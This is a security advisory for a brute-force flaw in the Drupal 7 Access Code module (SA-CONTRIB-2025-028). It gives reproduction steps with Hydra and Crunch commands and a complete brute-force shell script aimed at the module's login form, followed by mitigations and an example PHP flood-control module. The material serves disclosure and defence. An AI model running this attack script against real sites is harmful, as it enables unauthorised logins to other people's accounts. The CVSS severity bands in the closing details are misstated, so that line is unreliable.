SA-CONTRIB-2025-028

Category: Broken Access Control
Affects: Access Code Drupal module in Drupal 7
Versions: <=7.1.1
Patch Available

This Vulnerability has been fixed in the Never-Ending Support (NES) version offered by HeroDevs.

Overview

Drupal is an open-source content management system known for its flexibility, robust features, and strong community support. Organizations of all sizes use it to build and manage dynamic websites and web applications. The Access Code contributed module allows users to log in using an access code instead of entering a username and password.

The module's access-code login form performs no flood control, that is, no rate limiting of failed attempts per IP address or per account. With flood control missing (and no other protective measure, such as a WAF, in front of the site), an attacker can determine a valid access code by brute force: the form will accept as many guesses as the attacker cares to send.

Broken Access Control occurs when an application fails to properly enforce restrictions on what users are allowed to do, enabling attackers to reach functionality, data, or resources they are not authorized for. It often stems from inadequate validation of user permissions, allowing someone to bypass intended security boundaries and perform actions beyond their assigned role.

In this case the weakness sits in the authentication step itself: guessing a valid access code logs the attacker in as the user the code belongs to, with that user's roles and permissions.

Any of the following ramifications are possible:

  • Allowing arbitrary code execution
  • Complete system compromise
  • Data theft or exposure
  • Data manipulation or destruction
  • Privilege escalation, and
  • Denial of service.

Typically, issues such as this are considered high-severity. However, this one is rated as medium-severity because of the following mitigating factors:

  • The module is not installed by default
  • Login through the module can be turned off for sensitive accounts.

This issue affects all versions of Drupal 7 Access Code up to and including 7.1.1; it is patched in Access Code NES version 7.1.2.

Details

Module Info

Product: Drupal

Affected modules: Access Code contributed module

Affected versions: <=7.1.1

Project page: https://www.drupal.org/project/access_code

Vulnerability Info

This medium-severity vulnerability is found in all versions of the Access Code module up to and including 7.1.1.

Steps to Reproduce

1. On the latest stable version of Drupal 7, install and enable a susceptible version of Access Code (such as 7.1.1).

2. Download and install THC-Hydra with one of the following:

On Linux:

sudo apt update && sudo apt install hydra

On macOS (via Homebrew):

brew install hydra

3. Create a user at Admin > People > Add user (“testuser”). Assign the user a short access code, such as GVK6.

4. Prepare a code list using Crunch.

          a. Install Crunch (Homebrew on macOS; on Debian/Ubuntu-based Linux use sudo apt install crunch):

brew install crunch

          b. Since the code is four characters drawn from A-Z and 0-9, generate a candidate list. The -t G@@@ template fixes the first character to G (matching the test code above) so only 36^3 = 46,656 candidates are produced (about 0.23MB), which keeps the demonstration short; a real attacker who knows nothing about the code would enumerate all 36^4 = 1,679,616 four-character codes (about 8.4MB), still a trivial list for Hydra:

crunch 4 4 ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 -t G@@@ -o codes.txt

5. Copy the script below into ./brute_access_code.sh, set your domain and port, and make the script executable (chmod +x brute_access_code.sh):

#!/bin/bash
# Brute-force the Access Code login form with THC-Hydra.
THREADS=32
DOMAIN="<your-domain>"
PORT=8090
SITE="http://$DOMAIN:$PORT"
ENDPOINT="/user/ac"
# Fetch the form once to pick up the form_build_id that Drupal 7 expects with every POST.
FORM_HTML=$(curl -s "${SITE}${ENDPOINT}")
FORM_BUILD_ID=$(echo "${FORM_HTML}" | grep -o 'name="form_build_id" value="[^"]*"' | cut -d '"' -f 4)
if [ -z "$FORM_BUILD_ID" ]; then
  echo "Could not extract form_build_id from ${SITE}${ENDPOINT}; is the module enabled?" >&2
  exit 1
fi
# http-post-form spec is path:POST body:failure string. ^PASS^ is replaced by each line of
# codes.txt; the 'dummy' field only exists to give Hydra a ^USER^ placeholder.
OPT="/user/ac:dummy=^USER^&access_code=^PASS^&form_build_id=${FORM_BUILD_ID}&form_id=access_code_login&op=Log%20in:Invalid access code|Too many failed login attempts. Please try again later."
hydra -l dummy -P codes.txt -t $THREADS -s $PORT $DOMAIN http-post-form "$OPT"

6. Run the attack:

% ./brute_access_code.sh

7. Observe that THC-Hydra successfully finds the access code, which means that there is no impediment to a brute force attack.

8. Use the Access Code NES module instead, re-run the attack, and observe that the brute force attack is thwarted.

Addressing the Issue

Users of the affected component(s) should mitigate this vulnerability in one of the following ways:

  • Using a Web Application Firewall (WAF), configure rate limiting rules to restrict the number of access code attempts per IP address per time period; consider rate limiting modules for webservers, as well
  • Disable access code logins for critical accounts
  • Implement a CAPTCHA challenge on the form after a certain number of failed attempts
  • Implement failed-attempt tracking in custom code, keyed per IP address (and per account where the account can be identified) using Drupal 7 core's flood API, rather than per session: an attacker simply discards the session cookie between requests, so session-based counters do not slow a brute-force tool down
  • Sign up for post-EOL security support; HeroDevs customers get immediate access to a patched version of this module.
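The following is an added example of what the "custom code" mitigation above looks like in practice; it is not the Access Code module's own code nor the HeroDevs NES patch. It is a small hypothetical helper module (access_code_flood) that wraps the module's login form with the same flood-control pattern Drupal 7 core applies to its username/password form in user_login_authenticate_validate(): refuse the attempt when the IP has exhausted its window, and count every rejected code. Assumptions: the form ID is access_code_login and the field is access_code (both taken from the POST body in the reproduction script above), and the limits copy core's user_failed_login_ip_* defaults (50 attempts per hour per IP).

```php
<?php
/**
 * @file
 * access_code_flood.module (hypothetical helper module, added example).
 *
 * Adds per-IP flood control around the Access Code login form using the
 * Drupal 7 core flood API (flood_is_allowed / flood_register_event), the
 * same mechanism core uses for its own login form.
 */

// Assumed limits, copied from core's user_failed_login_ip_* defaults.
define('ACCESS_CODE_FLOOD_IP_LIMIT', 50);    // failed attempts allowed ...
define('ACCESS_CODE_FLOOD_IP_WINDOW', 3600); // ... per this many seconds, per IP

/**
 * Implements hook_form_FORM_ID_alter() for access_code_login.
 *
 * The flood check is prepended so it runs before the module's own code
 * lookup; the recorder is appended so it sees whether that lookup failed.
 */
function access_code_flood_form_access_code_login_alter(&$form, &$form_state) {
  if (!isset($form['#validate'])) {
    $form['#validate'] = array();
  }
  array_unshift($form['#validate'], 'access_code_flood_pre_validate');
  $form['#validate'][] = 'access_code_flood_post_validate';
}

/**
 * Refuses the attempt when this IP address has used up its window.
 *
 * flood_is_allowed() keys on ip_address() by default, so a site behind a
 * reverse proxy must have $conf['reverse_proxy'] configured in settings.php
 * or every visitor shares the proxy's counter.
 */
function access_code_flood_pre_validate($form, &$form_state) {
  if (!flood_is_allowed('access_code_failed_login_ip', ACCESS_CODE_FLOOD_IP_LIMIT, ACCESS_CODE_FLOOD_IP_WINDOW)) {
    $form_state['access_code_flood_triggered'] = TRUE;
    // Same generic wording whatever the submitted code was, so the refusal
    // leaks nothing about whether the guess happened to be valid.
    form_set_error('access_code', t('Too many failed login attempts. Please try again later.'));
    // Log the lockout: this is the event a SOC wants to alert on.
    watchdog('access_code_flood', 'Access code flood limit reached for IP %ip.', array('%ip' => ip_address()), WATCHDOG_WARNING);
  }
}

/**
 * Counts a rejected code against this IP; the row expires after the window.
 *
 * Attempts already refused by the pre-validator are not counted again, which
 * matches core: the lockout lasts the window, it is not extended by hammering.
 */
function access_code_flood_post_validate($form, &$form_state) {
  if (!empty($form_state['access_code_flood_triggered'])) {
    return;
  }
  // Any validation error left by the module's own validator means the
  // submitted code was not accepted.
  if (form_get_errors()) {
    flood_register_event('access_code_failed_login_ip', ACCESS_CODE_FLOOD_IP_WINDOW);
  }
}
```

With these limits a single IP gets 50 guesses per hour, so exhausting the full 36^4 keyspace from one address would take years instead of the minutes Hydra needs against the unpatched form. The caveat is that per-IP counters do nothing against an attacker spreading guesses across many addresses; the remaining defence is the code's entropy, which is why the advisory also recommends disabling access-code login for critical accounts.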

Credits

Vulnerability Details

ID: SA-CONTRIB-2025-028
Project affected: Access Code Drupal module
Versions affected: <=7.1.1
Published date: August 26, 2025
Fix date: August 26, 2025
Severity: Medium (CVSS bands: Low >=0 <4, Medium >=4 <6, High >=6 <8, Critical >=8 <10)
Category: Broken Access Control